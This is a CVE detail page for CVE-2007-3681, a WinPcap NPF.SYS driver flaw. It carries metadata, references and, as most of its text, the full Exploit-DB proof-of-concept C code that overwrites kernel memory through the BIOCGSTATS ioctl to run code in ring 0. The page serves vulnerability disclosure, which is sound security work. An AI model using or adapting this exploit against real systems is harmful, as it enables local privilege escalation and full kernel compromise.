CVE-2007-3681 : Detail

CVE-2007-3681

0.13%V4
Local
2007-07-11
15h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The IOCTL 9031 (BIOCGSTATS) handler in the NPF.SYS device driver in WinPcap before 4.0.1 allows local users to overwrite memory and execute arbitrary code via malformed Interrupt Request Packet (Irp) parameters.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.6 AV:L/AC:M/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4165

Publication date : 2007-07-09 22h00 +00:00
Author : Mario Ballano Bárcena
EDB Verified : Yes

/* WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit ------------------------------------------------------------- Affected software: (*) WinPcap versions affected (Confirmed) - WinPcap 4.0 and previous (*) WinPcap fixed version (stable) : WinPcap 4.0.1 Note : There was an error in the previous advisory, which tells WinPcap 4.1 is affected, in fact WinPcap 4.1 is the beta version. (*) Operating systems affected (Confirmed) - Windows 2000 SP4 (Both server and workstation) - Windows XP SP2 - Windows 2003 Server - Windows Vista !! Description: It's a well known issue that WinPcap security model allows non-administrator users to use its device driver. If they don't manually unload it after using tools such as Wireshark (ethereal), which unfortunatelly oftenly happens, this can lead to unwanted network traffic sniffing and now with the help of this exploit to kernel mode code execution ;-) Remarks: The exploit code is a PoC and was tested only against Windows XP SP2, with minor modifications (delta offsets and changing VirtualAlloc for NtAllocVirtualMemory due to base address restrictions in Windows Vista ) should work on all OSes commented above. To test the PoC, just pick any software which uses WinPcap like WireShark, then start to sniff in any iface and close it (so WinPcap device gets up ). Run the exploit code (as guest user if you want) you should hit an int 3 in kernel mode :-) Vulnerability discovered by: Mario Ballano Bárcena, mballano[_at_]gmail.com http://www.48bits.com/ 24, April 2007 */ #define _CRT_SECURE_NO_DEPRECATE #include <windows.h> #include <stdio.h> #define IOCTL_BIOCGSTATS 9031 #define OUT_SIZE 0x10 #define NDRIVERS_LIST 100 enum OSes { OS_WXP=1, OS_W2K, OS_W2K3, OS_VISTA }; #define WXP_DELTA 0xA67FF; // SP2 Fully patched!! #define W2K_DELTA 0x0; #define W2K3_DELTA 0x0; #define WVISTA_DELTA 0x0; DWORD g_dwOsVersion = 0; LPVOID g_PatchAddress = NULL; LPBYTE g_WXP_PATCH_BYTES = "\x80\x83\xff\x2C\x75\x2F\x53\xE8\xE1\xA2\xF7\xFF\x89\x45\xDC\x85"; LPBYTE g_W2K_PATCH_BYTES = "\xCC\xCC\xCC"; LPBYTE g_W2K3_PATCH_BYTES = "\xCC\xCC\xCC"; LPBYTE g_WVISTA_PATCH_BYTES = "\xCC\xCC\xCC"; typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, DWORD , LPDWORD); typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, char *lpBaseName, DWORD nSize); typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD); BOOL GetNpfDevice (char *lpNpfDevice) { DWORD cb,lpType; char *lpList,*tmp; HKEY hkey; BOOL bRes = FALSE; lpList = malloc(0x1000); memset(lpList,0,0x1000); cb = 0x1000; if ( RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\EAPOL\\Parameters\\General",0,KEY_READ,&hkey) == ERROR_SUCCESS ) { printf("AQUI"); if ( RegQueryValueExA( hkey, "InterfaceList", 0, &lpType, lpList, &cb) == ERROR_SUCCESS ) { strcpy(lpNpfDevice,"\\\\.\\NPF_"); while(*lpList && *lpList !='{') lpList++; tmp = lpList; while(*lpList && *(lpList) != '}') lpList ++; *(++lpList) = '\0'; strcat(lpNpfDevice,tmp); bRes = TRUE; } } free(lpList); if (!bRes) { printf("Cannot generate NPF Device Name :-( \n"); } return bRes; } LPVOID GetNtosBase (VOID) { HANDLE hLib; PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; DWORD lpcbNeeded,i; LPVOID NtosBase = NULL; LPVOID *lpImageBases = NULL; char lpBaseName[MAX_PATH]; if ( ( hLib = LoadLibraryA("psapi.dll")) && ( pEnumDeviceDrivers = (PENUMDEVICES) GetProcAddress(hLib,"EnumDeviceDrivers") ) && ( pGetDeviceDriverBaseName = (PGETDEVNAME) GetProcAddress(hLib,"GetDeviceDriverBaseNameA")) ) { lpImageBases = malloc( sizeof(LPVOID) * NDRIVERS_LIST ); pEnumDeviceDrivers(lpImageBases,sizeof(LPVOID) * NDRIVERS_LIST,&lpcbNeeded); if ( (lpcbNeeded / sizeof(LPVOID)) > NDRIVERS_LIST) { lpImageBases = realloc(lpImageBases,sizeof(LPVOID) * lpcbNeeded); pEnumDeviceDrivers(lpImageBases,lpcbNeeded,&lpcbNeeded); } for (i = 0; i < (lpcbNeeded / sizeof(LPVOID)) ; i++ ) { if ( pGetDeviceDriverBaseName(lpImageBases[i],lpBaseName,MAX_PATH) ) { printf ("%s\n",lpBaseName); if (!strcmp(lpBaseName,"ntoskrnl.exe")) { NtosBase = lpImageBases[i]; printf("NTOSKRNL Base found at %#p\n",NtosBase); break; } } } free(lpImageBases); } else { printf("Cannot Load psapi exports!\n"); } return NtosBase; } DWORD GetOSVersion (VOID) { OSVERSIONINFOA osvi; DWORD retval = 0; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); if ( GetVersionExA(&osvi) ) { if (osvi.dwMajorVersion == 5) { switch(osvi.dwMinorVersion) { case 0: retval = OS_W2K; break; case 1: retval = OS_WXP; break; case 2: retval = OS_W2K3; break; } } else if (osvi.dwMajorVersion == 6) { retval = OS_VISTA; } } g_dwOsVersion = retval; return retval; } DWORD GetNtosDelta (VOID) { DWORD retval = 0; switch(GetOSVersion()) { case OS_VISTA: printf("System identified as Windows Vista\n"); retval = WVISTA_DELTA; break; case OS_W2K: printf("System identified as Windows 2000\n"); retval = W2K_DELTA; break; case OS_W2K3: printf("System identified as Windows 2003\n"); retval = W2K3_DELTA; break; case OS_WXP: printf("System identified as Windows XP\n"); retval = WXP_DELTA; break; default: printf("Unidentified system!\n"); } return retval; } __declspec( naked ) void ShellCode (VOID) { // Just debug it, to check code execution ;-) __asm int 3; // The patch _should_ be done fastly ... that´s why we use global vars... switch(g_dwOsVersion) { case OS_VISTA: memcpy( g_PatchAddress, g_WVISTA_PATCH_BYTES,0x10); break; case OS_W2K: memcpy( g_PatchAddress, g_W2K_PATCH_BYTES,0x10); break; case OS_WXP: memcpy( g_PatchAddress, g_WXP_PATCH_BYTES,0x10); break; case OS_W2K3: memcpy( g_PatchAddress,g_W2K3_PATCH_BYTES,0x10); break; } // Go out without raising an exception ;-), indeed this is inside a SEH frame but ... wtf! :-) __asm { mov eax, [g_PatchAddress] inc eax push eax ret } } int main(int argc, char **argv) { HANDLE hDevice; LPVOID lpNtosSwitch; DWORD cb, delta; DWORD values[4]; LPVOID lpFakeTable; PQUERYSYSTEM NtQuerySystemInformation; char szNpfDevice[100]; BYTE QueryBuffer[0x24]; int i; NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress(GetModuleHandleA("NTDLL.DLL"),"NtQuerySystemInformation"); printf ("Searching for a valid Interface ...\n"); if ( GetNpfDevice(szNpfDevice) ) { printf("NPF Device name generated! : %s\n",szNpfDevice); } else { printf("Cannot found any valid Interface!\n"); return 0; } if ( lpFakeTable = VirtualAlloc((LPVOID)0x570000, 0x20000, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) ) { printf("Memory allocated at %p\n",lpFakeTable); for ( i=0; i < ( 0x20000/sizeof(LPVOID) ); i++) { * ( (LPVOID *)lpFakeTable + i) = ShellCode; } printf("Memory mapping filled! ... \n"); } else { printf("Cannot allocate memory!\n"); return 0; } if ( (hDevice = CreateFileA(szNpfDevice, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL) ) != INVALID_HANDLE_VALUE ) { printf("Device %s succesfully opened!\n", szNpfDevice); if ( (lpNtosSwitch = GetNtosBase()) && ( delta = GetNtosDelta()) ) { g_PatchAddress = (LPVOID) ((LPBYTE) lpNtosSwitch + delta ); if ( DeviceIoControl(hDevice, IOCTL_BIOCGSTATS, (LPVOID)0,0, (LPVOID)values,OUT_SIZE, &cb, NULL) ) { printf("First time reading ... bytes returned %#x\n",cb); for (i = 0;i<4;i++) { printf ("OutBuffer[i] = %#x\n",values[i]); } } printf("Launching exploit ... \nOverwritting NTOSKRNL switch at -> %#p\n",g_PatchAddress); if ( DeviceIoControl(hDevice, IOCTL_BIOCGSTATS, (LPVOID)0,0, (LPVOID)g_PatchAddress,OUT_SIZE, &cb, NULL) ) { // Dirty trick .. NtQuerySystemInformation(0x15,QueryBuffer,sizeof(QueryBuffer), NULL); // Bye bye god mode! printf("We are back from ring0!\n"); } } } else { printf("Error: Cannot open device %s\n",szNpfDevice); } } // milw0rm.com [2007-07-10]

Products Mentioned

Configuraton 0

Winpcap>>Winpcap >> Version 3.1

Winpcap>>Winpcap >> Version 4.0

References

http://securitytracker.com/id?1018350
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/4165
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/25982
Tags : third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/37889
Tags : vdb-entry, x_refsource_OSVDB
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=550
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.securityfocus.com/bid/24829
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/2468
Tags : vdb-entry, x_refsource_VUPEN